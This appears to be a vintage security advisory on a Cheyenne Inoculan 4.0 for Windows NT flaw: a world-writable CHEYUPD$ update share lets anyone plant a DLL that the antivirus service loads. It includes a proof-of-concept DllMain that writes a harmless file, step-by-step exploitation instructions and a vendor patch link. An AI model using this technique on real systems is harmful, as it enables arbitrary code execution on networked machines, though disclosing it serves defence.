COMMAND
Cheyenne Inoculan
SYSTEMS AFFECTED
Win NT
PROBLEM
Paul Boyer found following. It is possible to run arbitrary code
on any Intel machine running Cheyenne Inoculan version 4.0 for
Windows NT (any version of NT) prior to SP2. Same kind of
vulnerabilities might exist with other anti-virus product
providing an auto-update mechanism.
To check if you are vulnerable (if you have the resource kit
installed), run SRVCHECK.EXE \\<YourMachine> else run srvmgr.exe
from a NT server on the same domain, select <YourMachine> and
select "Computer|Shared Directories". If there is a shared
directory called "CHEYUPD$" that allows "FULL CONTROL" to the
"EVERYONE" group, that's bad news.
Inoculan runs as a service, called "Cheyenne InocuLAN Anti-Virus
Server". When it starts, it replaces any shared directory with the
same name and shares "CHEYUPD$" with full control for the
everyone group. When the service starts, it does an update check
in this directory (usually "C:\Inoculan\Update\" ) using the files
"<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt" and
[idem]...\avh32dll.dll.
Simply "touching" or modifying the file "filelist.txt" for it
looks younger than real causes the update. The update causes the
service to stop, the avh32dll.dll DLL to replace the existing one
(usually in c:\inoculan\avh32dll.dll) and then starts the serv ice
again. When the service starts, it loads the DLL into memory, and
THEN does a lot of stuff (including checking if it is a valid
DLL). The problem is you can write a DLL that execute arbitrary
code at the time it is loaded in memory, at the precise time when
DllMain is called by the image loader, before any other function
have a chance to be called... Exemple (inoctroj.cpp):
#include "stdio.h"
long __stdcall DllMain (long, unsigned long, void*)
{
// Any code can goes here. This is an exemple
// What it does is simply create a file on C: drive root directory
// and writing "hello world !" inside of it
FILE * demo;
// create a file
demo = fopen ( "C:\\I_can_write_a_file.txt", "w");
// write to the file
char * buf = "hello world ! ";
fwrite ( buf,1, 15, demo);
fclose ( demo );
// This aborts the DLL loading. Anyway, we're done at that time ;))
return 0;
}
Compile and link to make the target avh32dll.dll
Write it to <NtBox>\CHEYUPD$\English\NtIntel\Ready\
Touch <NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt in the
same directory for it is more recent than initially.
Stop the "Cheyenne InocuLAN Anti-Virus Server" on the <NtBox>
machine and start it again (alternatively shutdown and restart the
machine). Here you are: there is a file "I_can_write_a_file.txt"
in "C:\" on <NtBox>.
An interesting point is that Inoculan uses "domains". In one
domain, a single server forwards the updates to all machines
participating in that "domain" (nothing to do with NT domains).
THIS WAS NO TESTED, but one would expect a much worse scenario if
the trojan is written to the inoculan domain's server CHEYUPD$
shared directory. Trojan would be copied to all machines of that
domain. This is serious, because all machines would be running
arbitrary code in place of the anti-virus program.
SOLUTION
There's InocuLAN for Windows NT Security Patch. This patch
addresses possible security concerns regarding the CHEYUPD$ hidden
share. This patch can be applied to builds 269, 270 (Service Pack
1 level) or build 373 (Service Pack 2A level). Get it at:
http://www.cai.com/cheyenne/CheyTech/techbases/ilnt/cheyupd$.html